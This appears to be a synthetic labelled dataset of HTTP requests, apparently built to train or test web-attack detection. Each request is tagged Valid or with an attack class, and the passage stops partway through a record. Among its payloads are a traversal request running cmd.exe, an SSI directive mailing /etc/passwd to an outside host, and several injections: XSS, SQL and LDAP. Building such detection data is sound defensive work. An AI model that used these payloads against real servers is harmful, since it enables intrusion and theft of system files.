MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Basic cnRjZW86bnNucmZu
Authorization: Basic ZGhkcnRxUXc6ZXFuYQ==
Range: 6-,-8,-324
Referer: /elht1dr/eledmnsa.aspx
TE: trailers,trailers
Trailer: Accept-Encoding
User-Agent: gm40ik http://www.4nrheh.gov
UA-CPU: StrongARM
UA-Disp: 9739,949,32
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 669x659
Via: HTTP/4.1 81.37.93.231
Transfer-Encoding: deflate
Upgrade: encr/4.7, csRuef/7.1, ee6/1.4, tehaa/9.8, 7en/7.5
Warning: 339 61.166.132.90 "rcet3Eom" "Thu, 02 Nov 06 21:37:37 CET"
X-Forwarded-For: 229.236.129.140
X-Serial-Number: 522982707
----: ---------------------
~~~~~: ~~~~~~~~~~~~

p@lforH4echor2=iUh&emoaurare=Bno&mvbscriptLv=245282&adt1EccHii=mdtl4&rnti4Cy3=h&tHrvdaesirczr2l=dqzrl0orwheres&Eiet95VUcalss=6466&ntYoowdlathmx=4&w9=twat&iaheYt=95483

End - Id: 33442
Start - Id: 23732
class: Valid
GET /a_/2ec/csnxhcohdni/mTehe7reaIlool1.htm? HTTP/1.0
Host: 21.252.79.152
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: gzip, deflate
Accept-Language: it5srI-t, e-ai5ekaii
Cache-Control: max-stale
Client-ip: 135.165.39.16
Cookie: iDoe=b
Cookie2: $Version="45"
Date: Sun, 27 Aug 06 16:29:07 CET
ETag: W/"XNE2Ei4pOYWMUMOWeFS"
Expect: 100-continue
From: SDcfto@h1dceuR3.cz
If-Modified-Since: Wed, 31 May 06 19:38:50 UTC
If-Unmodified-Since: Sat, 19 May 07 08:55:39 GMT
If-Match: *
If-None-Match: "g8S.j_.2Iszpxv6"
If-Range: Thu, 31 Jul 08 07:32:06 CET
Max-Forwards: 4
MIME-Version: 4.4
Pragma: g=leeego
Proxy-Authorization: NTLM YTJ2Y2Vtc29wdGF1bWZlaWRtaGUxZmVvc2RvdHdnYUFpcg==
Authorization: r1dstt etfhtmes=w3oAp
Range: -020,8-,8-1
Referer: /bslpbi/AEe4b/oj5i/e1ighan/a7ie.jpeg
TE: trailers
Trailer: Range
User-Agent: tcId1rarnaodIoyoraa
UA-CPU: Sparc
UA-Disp: 807,314,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 431x276
Via: 6.2 200.240.125.212:79, 8.5 105.155.161.198
Transfer-Encoding: gzip
Upgrade: Oias/7.2, yee/0.3
Warning: 843 www.wgspyi.tiff:2 "uardrdnasUfstccn" "Sat, 28 Aug 04 22:14:21 GMT"
X-Forwarded-For: 204.159.198.225
X-Serial-Number: 13224
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23732
Start - Id: 43896
class: OsCommanding
GET ..��../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.hegeee3.biz
Connection: close
Accept: text/*
Accept-Charset: *
Accept-Encoding: identity, compress;q=0.9
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 132.194.132.1
Cookie: iauZteY6q=886;he=dw6raatNb;pgyetteqaf3r6=r1~at;0otndXotbOw=8itslws4;oqeaoo8=8612357245
Cookie2: $Version="6"
Date: Thu, 10 Sep 09 17:24:21 UTC
ETag: "Ep17MfiXz7naL9aGqdZ"
Expect: 100-continue
From: pni8hEt@brlOo.ch
If-Modified-Since: Mon, 22 Nov 04 13:02:31 UTC
If-Unmodified-Since: Sun, 18 Apr 10 10:00:58 GMT
If-Match: "8Srd7BqaI14qLa_DNIbX"
If-None-Match: "YPxlz7._xFR2j-Bam"
If-Range: "2tqlO7hzTvEd9x3Owg8"
Max-Forwards: 7
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: NTLM dGxFdHRpbnNuZXRwZmlwU2NjcGVucmk5bWFkbXFhbGhlb2FmZQ==
Authorization: P6xano coke=eW4hee
Range: 3121-127,822-
Referer: /aeabici/rued.nsf
TE: chunked;q=0.2,chunked;q=0.2,gzip
Trailer: If-Match
User-Agent: iaSOCjeJ http://www.ade0.it
UA-CPU: StrongARM
UA-Disp: 8243,837,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 349x5070
Via: 9.0 239.185.121.92:97478
Transfer-Encoding: identity
Upgrade: oBor/5.4, bstr/6.6
Warning: 453 28.223.229.127 "anutRoc7" 
X-Forwarded-For: 76.128.111.137
X-Serial-Number: 83787585359566262
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43896
Start - Id: 15830
class: Valid
GET /sltdtEtbdIAme0no/c5a/AwoIservicestelnetB/s3xbZ6CXAdF4MlFx/uRPU4KLtKyWqytcZrIQQ/evoaw-BkP_6LvxlKKEMl/em4afptogwmpdt3Oyg/ooim/_KvR.dll? HTTP/1.0
Host: www.cedteOnnnr.uk:80
Connection: keep-alive
Accept: text/*;q=0.4
Accept-Charset: x-mac-hebrew, x-mac-turkish;q=0.3, euc-jp, euc-kr, shift_jis
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 216.182.221.89
Cookie: uojm=24;ws4lu6yl0noEmig=ss ojaRnunm;bgmfdiiTaffn=dh4;loo=yboot.iniueRltytd
Cookie2: $Version="6"
Date: Wed, 17 Mar 10 02:35:28 CET
ETag: "-zD5AKL1D31Ed9N8"
Expect: 100-continue
From: ueo4hmt0@eibOany.com
If-Modified-Since: Mon, 22 Jun 09 04:37:23 CET
If-Unmodified-Since: Sat, 07 Aug 04 13:23:45 GMT
If-Match: "2rSQ-5OIw-BRXmJ"
If-None-Match: *
If-Range: "kuBXRQ9HVuEQVHMfK"
Max-Forwards: 4982
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Digest username="tnelie"
Authorization: Digest nonce
Range: -630,9-,363-
Referer: /ao7o.rar
TE: trailers,deflate,deflate
Trailer: If-Unmodified-Since
User-Agent: nctb (vjCRoxMn; 6UpUgC; dVwwEax; nyl8Emoj)
UA-CPU: 68000
UA-Disp: 3222,4414,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 132x8371
Via: 7.3 www.raGb2sa.html, FTP/5.2 www.ahAi.tiff
Transfer-Encoding: deflate
Upgrade: tnsap/4.9, hb3i/7.3, teoa/7.0, yetn/8.3, dof/3.7
Warning: 734 www.a4hol.gif "8eiyls3tra8i3ro" "Sun, 10 Sep 06 06:04:47 CET"
X-Forwarded-For: 30.73.53.136
X-Serial-Number: 6066558353005235
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15830
Start - Id: 40034
class: SSI
GET /skrq4816/tFKt.php3?tni8LspyLii=%3C%21--+++%23exec++++cmd%3D%22%2Fbin%2Fmail+++elK.com++%3C++++%2Fetc%2Fpasswd%22--%3E&dmeaee2r=551547&FtlXx6=65552&EmQlsEicepm=9541&Ifetdixn=oanao&B-u@5N6Yb=4&tfmbp=coenyoh2cA3&Edemy=ahavinghyn&2wnshyeOb=44064315&o1Noaeo7moti=60268394&ISeachth2eoars=egxyeunnhi HTTP/1.0
Host: www.oeRumi1tng.gov:80
Connection: keep-alive
Accept: text/html, image/png
Accept-Charset: x-mac-hebrew, iso-8859-3;q=0.2, iso-8859-6;q=0.9, euc-tw;q=0.6, x-mac-hebrew;q=0.7
Accept-Encoding: deflate, identity
Accept-Language: cetose-taad7m, sh-shtetu;q=0.8, b6-0, ng8Gs-oeshu
Cache-Control: no-store
Client-ip: 160.214.20.200
Cookie: denuaajnNhmzm=insertar1zgdntRNi 7ed;7c0Ua0msifzCji=htE ;in=432253
Cookie2: $Version="730"
Date: Sat, 05 Feb 05 16:15:41 UTC
ETag: "1oi95JajISSvSc6NmwV"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Fri, 05 Aug 05 01:08:42 GMT
If-Unmodified-Since: Sun, 02 Aug 09 24:28:10 CET
If-Match: *
If-None-Match: *
If-Range: "wF2Fa-zKqQovo@gtN"
Max-Forwards: 02
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: Digest username="tsbedo"
Authorization: lxsriy ycusa=blqo
Range: 41683-1312,-3
Referer: /zrbu/asfa2t/csohiA.jsp
TE: deflate;q=0.4,trailers
Trailer: Warning
User-Agent: Mozilla/6.8 (compatible; MSIE 2.6; Mac OS X; zensf4vaS; tdituhsy; ado1)
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 1.1 www.ahd42b.css, BIhte/0.9 76.80.83.86:72, HTTP/1.3 www.qiet.tiff
Transfer-Encoding: gzip
Upgrade: 9gTeo/9.5
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 36197
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40034
Start - Id: 16862
class: Valid
GET /h5g@/cW/C60x_/su/oHELctcn2Oe/x__u5F0/0aunoeee/Uepebemaaanoe/sSr40aTx/wapfa3loobt3ae/rhoUt1Cb5igioh0Lgr.png?4uKzrTtdn5rK=4eei0du HTTP/1.1
Host: 189.10.207.125:80
Connection: raM9t
Accept: */*
Accept-Charset: utf-8, macintosh;q=0.6, iso-8859-8, cp-950, utf-7
Accept-Encoding: 
Accept-Language: wtn-easere;q=0.6, nOep-ej;q=0.5, 7dieii-yaeg
Cache-Control: bd='ltc'
Client-ip: 127.221.48.135
Cookie: .JmetaS=l1G=escriptwen;eoeeo=T);esomjlAo=73567;J-ynX=54740656;gfi7HetTvmr7=)i;0baahhe=s
Cookie2: $Version="9"
Date: Mon, 28 Dec 09 01:18:59 GMT
ETag: W/"DTmAWxGg_Ca6HBmMC.v"
Expect: eyBtichp
From: sad4d0o@e9nnxnucoh.be
If-Modified-Since: Sat, 20 Nov 04 19:11:02 UTC
If-Unmodified-Since: Sun, 16 Apr 06 05:07:42 GMT
If-Match: "nEIc.gIVYc4fG_nOz0km"
If-None-Match: *
If-Range: Tue, 11 Jan 05 13:42:46 CET
Max-Forwards: 80
MIME-Version: 8.8
Pragma: ahEu9i='yem'
Proxy-Authorization: Basic aG5laXc6ZGxxblU=
Authorization: Digest username="9If4ua7"
Range: -2762
Referer: http://dEdu.net/tsoRrak1.msf
TE: gzip,trailers,trailers
Trailer: Trailer
User-Agent: heaqgiha (hjgKHe; p6Zr5@XI8e; nEj5hx5I; oiQOV8l-)
UA-CPU: Sparc
UA-Disp: 199,9704,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x8989
Via: 2.8 www.iNvla.tiff, 5.4 www.wkvr.css:79828, nt6n9/7.1 38.219.132.46
Transfer-Encoding: identity
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 5.165.70.120
X-Serial-Number: 926077
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 16862
Start - Id: 24788
class: Valid
GET /XUGCtmp.png?eEst=40&t4ysrCaupe5tta=i%3Dngtd4+8y&j0rptciu=+nv&Nse6nxetHLet=Enaez5y&ykwzrviOtznet4=wEtYvjtnph9s&uhnaod=3am3b%3B%3Dsreplaceousr&y3Hn=fr7dn%40y HTTP/1.0
Host: www.thiE.gov
Connection: t5tg
Accept: image/gif;q=0.5, application/*, image/png;q=0.0
Accept-Charset: iso-8859-2
Accept-Encoding: deflate
Accept-Language: *
Cache-Control: max-stale
Client-ip: 37.10.59.54
Cookie: aLdiyerndi=733;eaioi3Sa1ee=siebEBmor0aplrie;sNin=elsts;0a1hxsntxe=8806;egleairh3=mLqnlHGx
Cookie2: $Version="3"
Date: Sat, 15 Sep 07 03:54:48 CET
ETag: "_9OaFhpSDrI2QqRfunJ"
Expect: 100-continue
From: iesi0goR@Pnih.ch
If-Modified-Since: Fri, 06 Feb 04 06:23:15 UTC
If-Unmodified-Since: Mon, 28 Jun 04 23:37:01 CET
If-Match: "KjuZpo1eV9Zb2ADU"
If-None-Match: *
If-Range: Mon, 02 Feb 09 22:20:29 UTC
Max-Forwards: 24
MIME-Version: 8.0
Pragma: no-cache
Proxy-Authorization: Nixaoe ihecer=0gNx
Authorization: ahe2u jil3e=yhriw
Range: -5,-50,2-85387
Referer: http://Sliact2e.st/blgrhiq/os7g/yN6o.mspx
TE: trailers,trailers,deflate;q=0.0
Trailer: Accept
User-Agent: Mozilla/9.7 (Machintosh; U; Mac OS X 9.0; hd-hA; rv:1.9.0) Gecko/71178721
UA-CPU: x86
UA-Disp: 1309,0345,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 540x246
Via: 9.7 www.cbhasIk5.tiff:0, lyqLu/3.4 69.39.232.145, FTP/1.8 111.194.66.155
Transfer-Encoding: deflate
Upgrade: hth/9.0, mu3eiy/7.6, tfet8s/2.8, lWeo9d/7.8, oud/9.2
Warning: 449 www.ietcs.gif "QrTsopa" "Sat, 26 Sep 09 14:09:23 UTC"
X-Forwarded-For: 21.89.90.200
X-Serial-Number: 05073071780221168240
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24788
Start - Id: 30737
class: Valid
GET /eljGTgZglkG3Mkn.js?xp=5443&vtefOhstysarevv=86364&yHNl@xP@O.zd=u3CcQjbGfX4o&Baaelitmsweo7=bm3&rMrnrltnu=184&isett8edlimdsoJ=r&eethb=otdss%25olner5&y3HIG_pv3=315 HTTP/1.0
Host: 85.224.235.183
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.2, identity;q=0.6, gzip;q=0.5, compress;q=0.8, identity;q=0.1
Accept-Language: s4n-actscifg;q=0.5, rrr-osae7s;q=0.3, mrsonfls-nn9itora, hh-yao;q=0.0, obdzta-Li
Cache-Control: min-fresh=221
Client-ip: 45.133.46.216
Cookie: el0fbei=7;sforpw=am5mH;5golgrg=1
Cookie2: $Version="3"
Date: Mon, 27 Mar 06 22:48:11 GMT
ETag: W/"M9fGJXIAKHN3hNALUrgN"
Expect: 100-continue
From: dubt@tmrdi.net
If-Modified-Since: Wed, 19 Apr 06 11:12:27 GMT
If-Unmodified-Since: Sun, 02 Oct 05 12:05:08 GMT
If-Match: "Ib8gIZbn4V5ccVC2"
If-None-Match: *
If-Range: Wed, 09 Aug 06 17:36:56 UTC
Max-Forwards: 840
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: uwea ht18Lnh=tnrantuh
Authorization: Basic c2NvbjM6b2hlcmhlcg==
Range: 4297-25184
Referer: http://gyhwmiq.com/atcai3/b9ucNj/teht2s/otbiir.doc
TE: trailers,deflate;q=0.3,trailers
Trailer: If-Modified-Since
User-Agent: tvoy (rpnYziW; c-Dr56XF; 6E8rPHvW-; fLOyMga072)
UA-CPU: x86
UA-Disp: 593,0984,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 2445x5903
Via: 9.9 243.206.182.255
Transfer-Encoding: deflate
Upgrade: uom4/0.1, suMtl/8.8
Warning: 994 www.tuorse.js:74927 "slsp2oatzxr0wEyhOhx" 
X-Forwarded-For: 158.68.127.255
X-Serial-Number: 567820794809201
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30737
Start - Id: 18340
class: Valid
GET /qkP3zneOa4p/aogo/fZsnpM@Niconnect-/k_gHZFhttpE2W/sh_/JCY/h2sgi7H/xlkjlXdS5tl/9esdrfedqeebehdi.png?oS89C=te3e&nqhAt0rnfzn1=eWy01xUV&POKtwinnt4xSOk=etsh&H0HsF=669962&ceheqti=ui9E7tZ0&aehvrre=ea&X6_porwn_-=meeseNlhr1e&s_oUlslog9KQx1=aA68v4vPuVWA HTTP/1.0
Host: www.ap7c.org
Connection: iinxLbr
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 159.233.57.166
Cookie: eKmeat9S=sae]0irh
Cookie2: $Version="88"
Date: Tue, 01 Apr 08 23:50:59 CET
ETag: W/"FrEg431hhzfkL2r1zPs"
Expect: eowpnop=pu8ih;rett
From: tehgh57h@ejdoaoe.gov
If-Modified-Since: Fri, 09 Jul 04 20:35:10 GMT
If-Unmodified-Since: Mon, 20 Feb 06 22:20:36 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Jun 07 22:45:24 GMT
Max-Forwards: 87
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Digest cnonce="remesmh4"
Authorization: NTLM aG1hdXRsb25TcGFicmFpaHBoaWlRZWVycnJrZWFoY3Jlb2llb2FsZlRpZXNjZG5v
Range: 1528-
Referer: http://ireeutt.net/abrri/ojcq/srs0/2uetoe8/wtha.msf
TE: trailers
Trailer: Date
User-Agent: erT726a (7SR6ulZb)
UA-CPU: x86
UA-Disp: 350,951,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0744x394
Via: 8.4 67.76.201.40, 6.3 29.53.223.172
Transfer-Encoding: identity
Upgrade: geO/3.5
Warning: 253 24.0.106.147 "r6nyEsuNdiuaaAlcTsi" "Sat, 27 Mar 04 01:27:38 CET"
X-Forwarded-For: 242.160.205.160
X-Serial-Number: 357804395049751205
----: ------------
~~~~~: ~~~~~~~~~~

null

End - Id: 18340
Start - Id: 47203
class: XSS
GET /ZuRd70a5X/TIFUG/hzpneirsiiAlmLTTyiso/lI6IDJmV_eHhi0hSrE-/nunbi.nsf?ckeem9cowR=ccmdmotswiedXe&roB8innwemhltdi=Eia&SE_AbgsoundML6=%3Cmeta+++http-equiv+++%3D++%22+++++refresh%22++++content++%3D+%22++0%3Burl%3Djavascript%3A++++%5Balert++++%28%27D52saroco%27%29%3B%5D%22+++%3E&v@jrm1hhtpass=y%24winntQe&xlb1ltsndr=61146&rcqallSa=5836&es5fahdtOEdNfhi=756&Sdd=tpd&rx0gu79=e7%28idwindow.open&hejitcl4=TNes&wea9d=lEdu%40T&0ianaoH=oiofhuemtrop&pAnooEnbl4al=33870&elratsha5cjri=1%5DedybR HTTP/1.1
Host: 128.66.104.192
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 63.161.16.102
Cookie: hotkiEund3ss=8952;src4uheo=xn/passwd;mieEm=0I;e7Esiojretde=]ss;@tMin3AJ=rs'lsW5i~e=wp-[n-
Cookie2: $Version="0"
Date: Thu, 13 Dec 07 12:10:54 CET
ETag: W/"sgzTyQPOVZPttH244HNT"
Expect: 100-continue
From: oUzNrsR@euuilaosen.cz
If-Modified-Since: Fri, 15 Jul 05 02:54:36 UTC
If-Unmodified-Since: Sat, 24 Jan 09 16:07:19 GMT
If-Match: *
If-None-Match: *
If-Range: "K6hLdMPJPUPnTW8"
Max-Forwards: 7
MIME-Version: 9.5
Pragma: lttyp9=a
Proxy-Authorization: cmtc 6Oi3=etwgrtg
Authorization: xncee y5grO=zShaslo
Range: 676-108618,2650-4238
Referer: /see0/prhe/hwcuO/yAi1va.rar
TE: trailers,chunked
Trailer: If-None-Match
User-Agent: loO8tNd/6.0.1.4.9
UA-CPU: 68000
UA-Disp: 4828,524,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 286x017
Via: ohg/0.0 www.sa4jsm.jpeg
Transfer-Encoding: 5ore; EErEntt=tRtocaD
Upgrade: urd/1.0
Warning: 683 181.248.214.19 "qlt9unMovxwdh" "Tue, 18 Jan 05 01:02:04 UTC"
X-Forwarded-For: 25.149.50.16
X-Serial-Number: 04739435468972088
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47203
Start - Id: 17462
class: Valid
GET /uariT/2mHo6t/E9betweenGS-O1Dvimgx/lyoimedfF8nN/aH@Uq/HautoexecFZ.php?aat=78&asoapniAih1ooej=heQN&aLceei3tngru=e%29lh HTTP/1.1
Host: 244.105.149.106
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-936, windows-1255;q=0.4, koi8, us-ascii
Accept-Encoding: identity;q=0.4, compress;q=0.6
Accept-Language: nltMYd-ia, fnazt-j, l4-dr
Cache-Control: no-cache
Client-ip: 141.4.227.36
Cookie: wEryoa5he=xEJ.
Cookie2: $Version="7"
Date: Sun, 04 Apr 10 11:12:51 UTC
ETag: W/"liM.760ulcTeNoyIAWl"
Expect: aunieea5
From: lyesr@autwc.com
If-Modified-Since: Mon, 12 Nov 07 21:21:15 UTC
If-Unmodified-Since: Sat, 26 Nov 05 24:11:26 GMT
If-Match: "@PEhNeE1VxDONJwJyohy"
If-None-Match: "0hRJW9xSXnZSftAg7u"
If-Range: "2jzLQxdKmBg1PD7DubQ9"
Max-Forwards: 206
MIME-Version: 0.4
Pragma: sm9ioic='otv'
Proxy-Authorization: NTLM RXNzaXR0aWFpZXpycmVkZHdvMGtJZGxpZWhoZW9nb3QzMWFidHRiZXJhYUxuaGc=
Authorization: NTLM NXJlOWRmc2F5dmdhc2lkb2NOdHJuZW9Db2NsT2RqZWl4dHVpdHVlZWZ0Z28=
Range: -46060,-501912,285072-125
Referer: http://ehdo.ch/Wg2o/hbenndem/eeeisht.jsp
TE: trailers,trailers
Trailer: Authorization
User-Agent: Smiluonsenlm
UA-CPU: MIPS
UA-Disp: 5103,184,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 767x663
Via: HTTP/6.3 245.92.75.31:62666, HTTP/6.1 100.42.226.146:04909
Transfer-Encoding: deflate
Upgrade: pUyt/2.3
Warning: 211 109.34.244.12 "yezUa83tnoebkfw" 
X-Forwarded-For: 29.239.233.138
X-Serial-Number: 4864116530046414
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17462
Start - Id: 25511
class: Valid
GET /f4nnseodEehge4y/eHBpf/hsaE/SFq30mFHsbodyypGwS/0_AKnW6HG5/uc4ieyBeSi/sC7Apm8.bin?N-k1X87where1opt=8i4Eeeziframey&eseocsctotiasi=%3F%40mftphtacces&c2sw=imcS4%40yc&aocoe=%24&yvAmpu8pj=tzee&riotnc8we=dnrbrrt&ii0bx=aehttps&nbesoaetSuo=dii HTTP/1.1
Host: 0.193.122.59:0
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-arabic, us-ascii;q=0.1, windows-1252
Accept-Encoding: identity;q=0.7
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 9.66.121.144
Cookie: th3Aheo=0320364;2weobu6eop9=]ia%OneOzly;7Sno9ht=2;4B6T=osaor;up3ujO=710343;wdgiXgucuo9u=aQxZZ22hVs
Cookie2: $Version="531"
Date: Sat, 01 Sep 07 09:48:07 GMT
ETag: W/"Yb_tx9yG@Ad7Oyq"
Expect: 100-continue
From: hhexy@ieecah.it
If-Modified-Since: Thu, 13 Oct 05 18:50:59 CET
If-Unmodified-Since: Tue, 15 Feb 05 03:26:36 GMT
If-Match: *
If-None-Match: "UpW9V12Yu2HxC.QGj@E"
If-Range: *
Max-Forwards: 4619
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: NTLM aWF0YWxzbmVtZ3EwZWl1MG5waXR3YXJkaXBIbm0wc3RuYmJhcnNlYnJjYg==
Authorization: Basic d2FjYzpMcmhnZVM=
Range: 6-,950-89
Referer: /mo8htj/GOt9Np/Au5ea.png
TE: gzip
Trailer: Accept-Encoding
User-Agent: Mozilla/3.6 (Machintosh; U; Mac OS X 4.6; mn-tr; rv:1.1.9) Gecko/41315132
UA-CPU: x86
UA-Disp: 0020,943,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 5796x493
Via: 4.4 www.O1og.htm
Transfer-Encoding: compress
Upgrade: ftdTss/7.6
Warning: 857 81.72.64.201:0289 "eelt7eziiiiloger" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 52901908993086938619
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25511
Start - Id: 41449
class: SqlInjection
PUT /bbCEi/orotroead/DPV@7JRtelnet_BPphpXD/2Li2TG8rDV/sTHtIyg41K/e9z@U0h/Awp-jyoFselectf/jaean.dll? HTTP/1.0
Content-Length: 136
Content-Language: ra
Content-Encoding: compress
Content-Location: /fnzvali/seSspz/rqsjc9/kcatwwd/d0ro.png
Content-MD5: RGFSNmEwNm5hRW1lMWNlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 28 Oct 09 17:39:24 UTC
Last-Modified: Mon, 30 Nov 09 04:09:04 GMT
Host: www.AcHneceb.fr
Connection: close
Accept: audio/x-wav;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: tgalnaor-9TgmECn2, az-a;q=0.9, tyuudOhm-aioinaun;q=0.9, imhemrct-5reIN;q=0.3
Cache-Control: min-fresh=6
Client-ip: 87.117.104.122
Cookie: lT=m2R
Cookie2: $Version="9"
Date: Thu, 06 Nov 08 02:46:41 UTC
ETag: W/"0T-9MndUn8_eYiCf9G8s"
Expect: wObo=kcnn
From: svetgtH@ellbmBnam.fr
If-Modified-Since: Mon, 23 Mar 09 16:54:15 GMT
If-Unmodified-Since: Thu, 12 Jan 06 10:48:15 CET
If-Match: *
If-None-Match: "a_YCkpd2EOy2bNf8ohzt"
If-Range: "dfAkBc5BPKkPXjMlYg"
Max-Forwards: 8083
MIME-Version: 9.4
Pragma: nren='eyd'
Proxy-Authorization: Digest uri=http://www.qaseCc.net/doze/ikttvm/5wrye.js
Authorization: DOta oenSzuon=hsmcy
Range: 863-,45-,1-
Referer: /dgeijas/inari.avi
TE: deflate;q=0.2
Trailer: Via
User-Agent: Mozilla/5.0 (X11; U; SunOS sun4u 0.3; na-t7; rv:0.2.8) Gecko/42288464
UA-CPU: MIPS
UA-Disp: 338,3350,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 738x118
Via: uTLL/1.4 www.eoasa.htm
Transfer-Encoding: identity
Upgrade: oin5s/2.1, itrt/4.7, tsm/7.1
Warning: 307 www.aiPaisn.jpeg:7090 "ttaoiIpDdouernxa" 
X-Forwarded-For: 12.79.200.187
X-Serial-Number: 9168693821015244526
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

stylewoF2BIi=' OR   'enrnttaas'    >  'S&AgnlHm0Od=ddbnlesrt tilak&tssyahl5rTufe4=documentaxdGlrgscu 0s2Spiu&mbtachEdhivdh=162

End - Id: 41449
Start - Id: 19574
class: Valid
GET /mX.RWm2wYZClocation/3q3AexecaLSperlOCBl/htsf/ozWzu2o0xodYDYer3YK/8Npasswdsh84UBVpperlEg/eeoeoc3fh4ltl64/9YkA/nIgNnSrgsnpe/stoyTn/99echo6J992SGj8Z@.mspx? HTTP/1.1
Host: 2.34.130.23
Connection: pNneizgR
Accept: application/*
Accept-Charset: windows-874
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 35.35.102.53
Cookie: ScOa2VdzM=ooeerttreaTmp
Cookie2: $Version="632"
Date: Mon, 06 Mar 06 02:59:10 CET
ETag: "QkcDEtk-s4R76tQuNSU"
Expect: paag7g=rbellrn
From: ogeen@6fmx.ch
If-Modified-Since: Tue, 20 Jan 04 12:55:37 UTC
If-Unmodified-Since: Wed, 13 May 09 09:29:57 GMT
If-Match: *
If-None-Match: *
If-Range: "EIWGF_veL5l.ZS9a"
Max-Forwards: 66
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest opaque="zaan"
Authorization: eoaoe s3ftt=L9aO5rhw
Range: 187147-0990,76-,-590377
Referer: /ufuntnt/vw6ain7/wnolnxie/qran.cfm
TE: deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/9.4 (Machintosh; U; PPC Mac OS X 0.7; n3-ak; rv:2.9.0) Gecko/50798175
UA-CPU: MIPS
UA-Disp: 187,0883,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 4605x2042
Via: HTTP/6.0 www.elezd.jpeg, t2q/8.1 www.nrde8uhl.shtml:3, ins0h/4.9 www.ang0.css
Transfer-Encoding: gzip
Upgrade: tecthp/7.8
Warning: 408 115.192.90.4 "lvsu" 
X-Forwarded-For: 240.111.161.144
X-Serial-Number: 1701611
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19574
Start - Id: 37305
class: LdapInjection
GET /qd8qGnetcatX9i8pE/eDIQVaUgNDu4/db9/olDI2Vu/srejxg/msafhc/isy7in/s056rU.mspx?select0uvk5O.vtSG=5&aterNe6ebb8Vg1=l7tUwm%40&7wajCrj=78770&tgusntnce5=7btelar&0trotatdsArhki=alnuorlc9t&lmeebe=52936&sWirohihtorler=anaolaetOencawbo&PVPWxtermM=8703219475 HTTP/1.0
Host: 6.121.247.230
Connection: gusOedpd
Accept: */*;q=0.7
Accept-Charset: iso-8859-8-i;q=0.0
Accept-Encoding: )   (    |  (   cn=*o  'brien*   )(mail   =*o   'brien* ) 
Accept-Language: shlGr-rnenM, s0Nxnni-ennnip;q=0.5
Cache-Control: no-cache
Client-ip: 114.21.239.10
Cookie: tn=i-o;nxrrshs=ptlr;5Eaccept-wtiframe1UV=inse
Date: Sun, 02 May 04 24:57:20 GMT
From: renaseu@zeie4ptso.uk
If-Modified-Since: Tue, 06 Jul 04 17:06:23 CET
If-Unmodified-Since: Thu, 26 Jun 08 01:55:19 GMT
If-Match: "UJFdYVDsOSyZoU9ERr"
